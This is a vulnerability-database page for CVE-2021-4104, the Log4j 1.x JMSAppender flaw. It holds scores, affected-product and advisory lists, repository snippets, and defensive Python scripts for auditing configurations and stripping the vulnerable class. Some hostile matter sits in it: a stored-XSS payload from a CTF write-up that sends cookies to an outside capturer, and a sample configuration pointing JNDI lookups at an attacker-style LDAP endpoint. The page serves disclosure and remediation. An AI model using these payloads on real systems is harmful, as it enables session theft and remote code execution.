
CVE-2021-4104

Published: 14/12/2021 Updated: 22/12/2023
CVSS v2 Base Score: 6 | Impact Score: 6.4 | Exploitability Score: 6.8
CVSS v3 Base Score: 7.5 | Impact Score: 5.9 | Exploitability Score: 1.6
VMScore: 540
CVSS v2 Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

Vulnerability Summary

A flaw was found in the Java logging library Apache Log4j in version 1.x. Its JMSAppender (org.apache.log4j.net.JMSAppender) performs JNDI lookups of the TopicBindingName and TopicConnectionFactoryBindingName values taken from the Log4j configuration, so an attacker who can write to that configuration can point the lookups at a server they control and execute code on the host, in the same way as CVE-2021-44228 does against Log4j 2.x. The flaw is only reachable when the deployed application is explicitly configured to use JMSAppender, which is not the default, and Log4j 1.2 has been end of life since August 2015, so the remediation is to move to a supported Log4j 2.x release (or at minimum remove the JMSAppender class from the jar) rather than wait for a 1.x patch. This flaw has been filed for Log4j 1.x; the corresponding flaw information for Log4j 2.x is available at: access.redhat.com/security/cve/CVE-2021-44228 (CVE-2021-4104)
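The condition in the summary, a configured JMSAppender plus attacker influence over its JNDI settings, can be checked directly in a deployment's log4j.properties or log4j.xml. The audit below is an added example, not code from this page or from Apache. The appender class name and the setter names it looks for (TopicBindingName, TopicConnectionFactoryBindingName, ProviderURL, InitialContextFactoryName, URLPkgPrefixes) are Log4j 1.2's own; the two sample configurations and the 198.51.100.7 endpoint are constructed for the example, and the 'remote-jndi' / 'unreferenced' / 'jms-configured' labels are this script's own classification.

```python
"""Audit Log4j 1.x configuration for the JMSAppender condition behind CVE-2021-4104.
Added example (not code from the page or from Apache). For every appender of class
org.apache.log4j.net.JMSAppender it reports the JNDI-related settings, whether one of
them names an off-host ldap/rmi/... endpoint, and whether any logger references the
appender: PropertyConfigurator and DOMConfigurator create appenders lazily on reference,
so an unreferenced definition never runs the lookups that activateOptions() performs."""
import re
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
# JMSAppender setters that feed the JNDI InitialContext and its two lookups.
JNDI_PARAMS = ("InitialContextFactoryName", "ProviderURL", "URLPkgPrefixes",
               "TopicConnectionFactoryBindingName", "TopicBindingName")
REMOTE_JNDI = re.compile(r"^(ldap|ldaps|rmi|iiop|dns)://", re.IGNORECASE)


def parse_properties(text):
    """Minimal java.util.Properties reader: key=value or key:value, '#'/'!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def _referenced_in_properties(props):
    """Appender names attached by log4j.rootLogger / log4j.logger.* / log4j.category.* lines."""
    refs = set()
    for key, value in props.items():
        if key in ("log4j.rootLogger", "log4j.rootCategory") or \
                key.startswith(("log4j.logger.", "log4j.category.")):
            tokens = [t.strip() for t in value.split(",")]
            refs.update(t for t in tokens[1:] if t)  # first token is the level
    return refs


def audit_properties(text):
    """{appender_name: {"params": {...}, "referenced": bool}} for each JMSAppender."""
    props = parse_properties(text)
    refs = _referenced_in_properties(props)
    report = {}
    for key, value in props.items():
        m = re.match(r"log4j\.appender\.([^.]+)$", key)
        if m and value == JMS_APPENDER:
            name, prefix = m.group(1), "log4j.appender.%s." % m.group(1)
            params = {p: props[prefix + p] for p in JNDI_PARAMS if prefix + p in props}
            report[name] = {"params": params, "referenced": name in refs}
    return report


def audit_xml(text):
    """Same report for a log4j.xml (DOMConfigurator) file."""
    root = ET.fromstring(text)
    refs = {r.get("ref") for r in root.iter("appender-ref")}
    report = {}
    for app in root.iter("appender"):
        if app.get("class") == JMS_APPENDER:
            params = {p.get("name"): p.get("value") for p in app.findall("param")
                      if p.get("name") in JNDI_PARAMS}
            report[app.get("name")] = {"params": params, "referenced": app.get("name") in refs}
    return report


def assess(report):
    """'unreferenced': defined but never instantiated; 'remote-jndi': a JNDI value names an
    ldap/rmi/... endpoint, so the lookup leaves the process; 'jms-configured': active, which
    is still CVE-2021-4104 exposure wherever the config file is attacker-writable."""
    verdicts = {}
    for name, info in report.items():
        if not info["referenced"]:
            verdicts[name] = "unreferenced"
        elif any(v and REMOTE_JNDI.match(v) for v in info["params"].values()):
            verdicts[name] = "remote-jndi"
        else:
            verdicts[name] = "jms-configured"
    return verdicts


# Constructed samples, not taken from any real deployment.
SAMPLE_PROPERTIES = """
log4j.rootLogger=INFO, stdout, jms
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory
log4j.appender.jms.ProviderURL=ldap://198.51.100.7:1389/
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
log4j.appender.jms.TopicBindingName=Exploit
"""
SAMPLE_XML = """<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="jms" class="org.apache.log4j.net.JMSAppender">
    <param name="ProviderURL" value="tcp://localhost:61616"/>
    <param name="TopicConnectionFactoryBindingName" value="ConnectionFactory"/>
    <param name="TopicBindingName" value="logTopic"/>
  </appender>
  <appender name="console" class="org.apache.log4j.ConsoleAppender"/>
  <root><priority value="info"/><appender-ref ref="console"/></root>
</log4j:configuration>
"""
```

Run assess(audit_properties(text)) over each log4j.properties found on a host and assess(audit_xml(text)) over each log4j.xml; anything other than an empty result deserves a look, and a 'remote-jndi' verdict on a file that non-administrators can write is the CVE-2021-4104 scenario itself. The 'unreferenced' verdict is deliberately separate: the lookup happens in activateOptions(), which only runs once a logger pulls the appender in, so a stale definition is a cleanup item rather than an active exposure.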

Vulnerable Products

apache log4j 1.2

fedoraproject fedora 35

redhat jboss operations network 3.0

redhat jboss a-mq 6.0.0

redhat enterprise linux 7.0

redhat enterprise linux 6.0

redhat jboss enterprise application platform 6.0.0

redhat jboss enterprise application platform 7.0

redhat jboss fuse 6.0.0

redhat jboss fuse service works 6.0

redhat jboss web server 3.0

redhat jboss data virtualization 6.0.0

redhat enterprise linux 8.0

redhat single sign-on 7.0

redhat software collections -

redhat jboss fuse 7.0.0

redhat process automation 7.0

redhat jboss data grid 7.0.0

redhat openshift application runtimes -

redhat codeready studio 12.0

redhat integration camel k -

redhat openshift container platform 4.6

redhat jboss a-mq 7

redhat openshift container platform 4.7

redhat integration camel quarkus -

redhat jboss a-mq streaming -

redhat openshift container platform 4.8

oracle weblogic server 12.2.1.3.0

oracle business intelligence 12.2.1.3.0

oracle business process management suite 12.2.1.3.0

oracle jdeveloper 12.2.1.3.0

oracle identity management suite 12.2.1.3.0

oracle business intelligence 12.2.1.4.0

oracle communications unified inventory management 7.3.4

oracle communications unified inventory management 7.3.5

oracle weblogic server 12.2.1.4.0

oracle weblogic server 14.1.1.0.0

oracle enterprise manager base platform 13.4.0.0

oracle communications network integrity 7.3.6

oracle business process management suite 12.2.1.4.0

oracle advanced supply chain planning 12.2

oracle advanced supply chain planning 12.1

oracle communications unified inventory management 7.4.1

oracle enterprise manager base platform 13.5.0.0

oracle healthcare data repository 8.1.0

oracle communications messaging server 8.1

oracle business intelligence 5.9.0.0.0

oracle communications eagle ftp table base retrieval 4.5

oracle retail extract transform and load 13.2.5

oracle utilities testing accelerator 6.0.0.2.2

oracle utilities testing accelerator 6.0.0.3.1

oracle utilities testing accelerator 6.0.0.1.1

oracle retail allocation 14.1.3.2

oracle retail allocation 15.0.3.1

oracle retail allocation 16.0.3

oracle retail allocation 19.0.1

oracle communications unified inventory management 7.4.2

oracle identity management suite 12.2.1.4.0

oracle financial services revenue management and billing analytics 2.7.0.0

oracle hyperion data relationship management

oracle financial services revenue management and billing analytics 2.8.0.0

oracle mysql enterprise monitor

oracle hyperion infrastructure technology

oracle tuxedo 12.2.2.0.0

oracle e-business suite cloud manager and cloud backup module 2.2.1.1.1

oracle financial services revenue management and billing analytics 2.7.0.1

oracle fusion middleware common libraries and tools 12.2.1.4.0

oracle communications offline mediation controller 12.0.0.5.0

oracle timesten grid -

oracle communications offline mediation controller

oracle stream analytics -

oracle goldengate -

Vendor Advisories

A flaw was found in the Java logging library Apache Log4j in version 1.x. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender. This flaw has been filed for Log4j 1.x; the corresponding flaw information for Log4j 2.x is available at: access.redhat.com/security/cve/CVE-2021 ...
It was found that when using remote logging with the log4j socket server, the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application (CVE-2017-5645). A flaw was discovere ...
Synopsis: Moderate: Red Hat Single Sign-On 7.4.10 security update. Type/Severity: Security Advisory: Moderate. Topic: A security update is now available for Red Hat Single Sign-On 7.4 from the Customer Portal. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base sc ...
Synopsis: Important: parfait:0.5 security update. Type/Severity: Security Advisory: Important. Topic: An update for the parfait:0.5 module is now available for Red Hat Enterprise Linux 8.2 Extended Update Support. Red Hat Produc ...
Synopsis: Low: Red Hat JBoss Web Server 3.1 Service Pack 14 security update. Type/Severity: Security Advisory: Low. Topic: An update is now available for Red Hat JBoss Web Server 3.1 for Red Hat Enterprise Linux 7 and Microsoft Windows. Red Hat Product Security has rated this release as having a security impact of Low. A Common Vulnerability Scorin ...
Synopsis: Low: Red Hat JBoss Web Server 3.1 Service Pack 14 Security Update. Type/Severity: Security Advisory: Low. Topic: An update is now available for Red Hat JBoss Web Server 3.1 for Red Hat Enterprise Linux 7. Red Hat Produ ...
Synopsis: Important: Red Hat JBoss Data Virtualization 6.4.8.SP1 security update. Type/Severity: Security Advisory: Important. Topic: An update is now available for Red Hat JBoss Data Virtualization. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, whic ...
Synopsis: Important: Red Hat Data Grid 7.3.9 security update. Type/Severity: Security Advisory: Important. Topic: An update for Red Hat Data Grid is now available. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, ...
Synopsis: Important: parfait:0.5 security update. Type/Severity: Security Advisory: Important. Topic: An update for the parfait:0.5 module is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red ...
Synopsis: Moderate: Red Hat Single Sign-On 7.5.1 security update. Type/Severity: Security Advisory: Moderate. Topic: A security update is now available for Red Hat Single Sign-On 7.5 from the Customer Portal. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base sco ...
Synopsis: Important: Red Hat JBoss Fuse/A-MQ 6.3 R20 security and bug fix update. Type/Severity: Security Advisory: Important. Topic: An update is now available for Red Hat JBoss Fuse 6.3 and Red Hat JBoss A-MQ 6.3. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) ...
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.4 security update. Type/Severity: Security Advisory: Important. Topic: A security update is now available for Red Hat JBoss Enterprise Application Platform 7 ...
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.4 security update. Type/Severity: Security Advisory: Important. Topic: A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring ...
Synopsis: Moderate: Red Hat Single Sign-On 7.5.1 for OpenShift image security and enhancement update. Type/Severity: Security Advisory: Moderate. Topic: A new image is available for Red Hat Single Sign-On 7.5.1, running on OpenShift Container Platform 3.10 and 3.11, and 4.9. Red Hat Product Security has rated this update as having a security impact ...
Synopsis: Important: Red Hat Single Sign-On 7.5.1 security update on RHEL 8. Type/Severity: Security Advisory: Important. Topic: New Red Hat Single Sign-On 7.5.1 packages are now available for Red Hat Enterprise Linux 8. Red Hat ...
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4 security update. Type/Severity: Security Advisory: Important. Topic: An update is now available for Red Hat JBoss Enterprise Application Platform 6.4. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System ( ...
Synopsis: Important: Red Hat Single Sign-On 7.5.1 security update on RHEL 7. Type/Severity: Security Advisory: Important. Topic: New Red Hat Single Sign-On 7.5.1 packages are now available for Red Hat Enterprise Linux 7. Red Hat ...
Synopsis: Low: RHV Manager (ovirt-engine) security update [ovirt-4.4.10-1]. Type/Severity: Security Advisory: Low. Topic: Updated ovirt-engine packages that fix several bugs and add various enhancements are now available. Red Ha ...
Synopsis: Important: parfait:0.5 security update. Type/Severity: Security Advisory: Important. Topic: An update for the parfait:0.5 module is now available for Red Hat Enterprise Linux 8.4 Extended Update Support. Red Hat Produc ...
Synopsis: Important: parfait:0.5 security update. Type/Severity: Security Advisory: Important. Topic: An update for the parfait:0.5 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this ...
Synopsis: Important: Red Hat JBoss Data Virtualization 6.4.8.SP2 security update. Type/Severity: Security Advisory: Important. Topic: An update is now available for Red Hat JBoss Data Virtualization. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, whic ...
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.24 security update. Type/Severity: Security Advisory: Important. Topic: A security update is now available for Red Hat JBoss Enterprise Application Platform ...
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4 security update. Type/Severity: Security Advisory: Important. Topic: An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Re ...
Synopsis: Moderate: Red Hat Fuse 7.10.1 release and security update. Type/Severity: Security Advisory: Moderate. Topic: A minor version update (from 7.10 to 7.10.1) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update ...
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.24 security update. Type/Severity: Security Advisory: Important. Topic: A security update is now available for Red Hat JBoss Enterprise Application Platform 6.4. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scori ...
Synopsis: Moderate: Red Hat Single Sign-On 7.4.10 on OpenJDK for OpenShift image security update. Type/Severity: Security Advisory: Moderate. Topic: A new image is available for Red Hat Single Sign-On 7.4.10 on OpenJDK, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Red Hat Product Security has rated this update as having a securit ...
Synopsis: Moderate: Red Hat Single Sign-On 7.4.10 on OpenJ9 for OpenShift image security update. Type/Severity: Security Advisory: Moderate. Topic: A new image is available for Red Hat Single Sign-On 7.4.10 on OpenJ9, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Red Hat Product Security has rated this update as having a security ...
Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update. Type/Severity: Security Advisory: Low. Topic: A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red ...
Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update. Type/Severity: Security Advisory: Low. Topic: A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4. Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) ba ...

Github Repositories

Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104.

Log4j version 1.2.17-aims. This jar was created to protect against CVE-2021-4104. It is meant to be used as a direct replacement for Log4j v1 libraries. Log4j 1.2 project page: logging.apache.org/log4j/1.2/ Apache 2.0 Licence: www.apache.org/licenses/LICENSE-2.0 Usage: add this to your pom.xml <project > <repositories> &a

Apache POI for JPHP! WARNING: this product uses the Log4J package from Maven (Apache Log4j Core » 2.17.1). Vulnerabilities from dependencies: CVE-2021-42550 CVE-2021-4104 CVE-2021-23463 CVE-2019-17571

Python wrapper for JFROG Xray REST API

Python wrapper for JFROG Xray REST API jfrog-xray-api is a live python package for JFrog Xray REST API Tables of Contents Install Usage Authentication SYSTEM Create Bundle Ping Request Get Version Metrics Components Find Component by Name Find Components by CVEs Find CVEs by Components Get Component List Per Watch Get Artifact Dependency Graph Compare Artifacts Get

Root-me & CTFlearn Challenges

1 Web application vulnerabilities XSS Stored 1 Steps to reproduce - Create a free request capturer @ pipedream.com - Start event listening at the request capturer - Visit challenge01.root-me.org/web-client/ch18/ - Choose any title - Enter <script>document.write("<img src=request_capturer_url"+document.cookie+"/>");

Cloud open api SDK for customer system to synchronize related data

PAXSTORE Open API Java SDK Security Announcement. This Open API SDK depends on log4j-1.2.7. It is not affected by the vulnerability CVE-2021-44228, but a similar vulnerability (CVE-2021-4104) was found in log4j 1.2.x. If the developer is not using JMSAppender it is not affected. The developer can also remove JMSAppender using the command (zip -q -d log4j-1.2.17.jar org/apache/log

Operational information regarding the log4shell vulnerabilities in the Log4j logging library.

Log4shell vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, CVE-2021-45105). This repo contains operational information regarding the Log4shell vulnerability in the Log4j logging library, especially CVE-2021-44228 / CVE-2021-45046; it also covers CVE-2021-4104 / CVE-2021-45105. For additional information see: NCSC-NL advisory, MITRE, CSIRT network members advisories

assignments Final project: the Apache Log4j vulnerability. Class: Finance and Information Management 3B, Student ID: 108AB0704, Name: 劉筑芸. Timeline: 2021/11/24 the Log4Shell vulnerability (CVE-2021-44228) was reported to Apache through a private channel; it was already patched in Log4j 2.15.0, released 2021/12/09. Apache Log4j2 security patch history: 2021/12/11 version 2.15.0 released, restricting the JNDI lookup feature, but this version


PowerShell scripts for Log4Shell. So far, it only includes the script Remove-ArchiveItem.ps1, which removes a specified class file from JAR files (or any ZIP file, for that matter). This allows one to implement one of the proposed workarounds for the Log4Shell vulnerability found in the Log4j 2.x Java library (CVE-2021-44228 and CVE-2021-45046). The workaround consists in removing the o

Supplier | Product | Version (see Status) | Status CVE-2021-4104 | Status CVE-2021-44228 | Status CVE-2021-45046 | Status CVE-2021-45105 | Notes | Links
Alphatron | Alphatron Repeater Display MFS-VJ | all | Not vuln | Not vuln | Not vuln | Not vuln | |
Alphatron | Alphatron Repeater Display MFS-VR | all | Not vuln | Not vuln | Not vuln | Not vuln | |
Alphatron | Alphatron Repeater Display MFS | all | Not vuln | Not vuln ...

Log4Shell (CVE-2021-44228): Description, Exploitation and Mitigation

CVE-2021-44228 On 9 December 2021 the world learned of a new security flaw affecting Log4J. The vulnerability's CVSSv3 (Common Vulnerability Scoring System) score was rated 10, which makes it critical (nvd.nist.gov/vuln/detail/CVE-2021-44228). CVSSv3 Its CVSSv3 vector is

Mend Bulk Report Generator

Mend Bulk Report Generator CLI Tool to generate reports on multiple products or projects The tool allows including and excluding scopes by stating their tokens Report scope (-s, --ReportScope) determines whether reports run on projects or products If included scopes (via -i, --includedTokens) are not specified, the tool runs reports on all scopes Report data exported by de

Log4j fix. This solution provides a fix for the following CVEs: CVE-2021-44228 CVE-2021-4104 CVE-2021-45046. This script scans the systems by the following rules: it first scans for all log4j*.jar files, then scans for all potential Java Archive files and checks whether log4j related content is embedded in them. Depending on the version found, it will remove the appropriate class from th
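The PAXSTORE note earlier in this list (zip -q -d against log4j-1.2.17.jar) and the scanner described just above both apply the same workaround for CVE-2021-4104: locate every archive that carries org/apache/log4j/net/JMSAppender.class and delete that entry. The Python below is an added example and is not the code of either repository. It walks a directory tree, identifies Log4j 1.x jars by content rather than file name, looks one level into WARs and EARs, reads the 1.x version from the jar's own Maven pom.properties, and rewrites top-level jars without the class. The fixture it builds in build_sample_tree (a 1.2.17-like jar whose class entries are just the four-byte class-file magic) is constructed for the example, not a real Apache artefact.

```python
"""Find Log4j 1.x archives that still carry JMSAppender and strip the class from them
(the CVE-2021-4104 'zip -d' workaround in pure Python). Added example, not code from the
page or from any repository it lists; the fixture is constructed, not a real Apache jar."""
import io
import os
import re
import tempfile
import zipfile
from collections import namedtuple

JMS_CLASS = "org/apache/log4j/net/JMSAppender.class"
LOG4J1_MARKER = "org/apache/log4j/Logger.class"          # present in every Log4j 1.x jar
POM_PROPS = "META-INF/maven/log4j/log4j/pom.properties"  # groupId 'log4j' is the 1.x artifact
LOG4J2_MAVEN = "META-INF/maven/org.apache.logging.log4j/"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

Finding = namedtuple("Finding", "path nested version has_jms_appender")


def log4j1_version(zf):
    """Version string if zf looks like Log4j 1.x, else None. Maven metadata is authoritative;
    1.x builds without it report 'unknown'. Log4j 2's log4j-1.2-api bridge also owns the
    org/apache/log4j package, so the verdict rests on the JMSAppender entry, not the prefix."""
    names = set(zf.namelist())
    if POM_PROPS in names:
        m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
        return m.group(1).strip() if m else "unknown"
    if LOG4J1_MARKER in names and not any(n.startswith(LOG4J2_MAVEN) for n in names):
        return "unknown"
    return None


def inspect_archive(zf, path, nested=""):
    """Yield a Finding for zf and for archives embedded one level down (WEB-INF/lib, EAR lib)."""
    version = log4j1_version(zf)
    if version is not None:
        yield Finding(path, nested, version, JMS_CLASS in zf.namelist())
    if nested:
        return
    for name in zf.namelist():
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from inspect_archive(inner, path, nested=name)
            except zipfile.BadZipFile:
                continue


def scan(root):
    """All Log4j 1.x archives under root, matched by content (shaded or renamed jars count)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(full) as zf:
                    findings.extend(inspect_archive(zf, full))
            except zipfile.BadZipFile:
                continue
    return findings


def strip_class(jar_path, entry=JMS_CLASS):
    """Rewrite jar_path without `entry` (a zip has no in-place delete). Returns True if removed."""
    tmp = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == entry:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))  # keeps timestamps and compression
    os.replace(tmp, jar_path)
    return removed


def build_sample_tree(root):
    """Constructed fixture: a 1.2.17-like jar (class entries are only the 0xCAFEBABE magic),
    a WAR embedding a copy of it, and an unrelated jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(POM_PROPS, "groupId=log4j\nartifactId=log4j\nversion=1.2.17\n")
        for cls in (LOG4J1_MARKER, JMS_CLASS, "org/apache/log4j/net/SocketAppender.class"):
            z.writestr(cls, b"\xca\xfe\xba\xbe")
    os.makedirs(os.path.join(root, "lib"))
    with open(os.path.join(root, "lib", "log4j-1.2.17.jar"), "wb") as f:
        f.write(buf.getvalue())
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-1.2.17.jar", buf.getvalue())
    with zipfile.ZipFile(os.path.join(root, "lib", "other.jar"), "w") as other:
        other.writestr("com/example/Foo.class", b"\xca\xfe\xba\xbe")


def demo():
    """Build the fixture in a temp dir, scan, strip top-level hits, rescan."""
    root = tempfile.mkdtemp(prefix="log4j1-")
    build_sample_tree(root)
    before = scan(root)
    removed = [strip_class(f.path) for f in before if f.has_jms_appender and not f.nested]
    return {"before": before, "removed": removed, "after": scan(root)}
```

Stripping the class is a stopgap rather than a fix: Log4j 1.2 has been end of life since 2015, the same jar still contains the other 1.x deserialization entry points (CVE-2019-17571's SocketServer among them), and a copy nested inside a WAR has to be extracted, rewritten and repacked, or the WAR rebuilt, rather than edited in place, which is why the scanner only reports nested hits. Stop the JVM before rewriting a jar it has open, and keep the pre-change hash so the change can be audited.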

🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks

🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tricks 📝 Description CVE-2021-44228 works on: log4j: 2.0 <= Apache log4j <= 2.14.1 Java version already patched: 6u211+, 7u201+, 8u191+, 11.0.1+ Windows Defender started to remove java f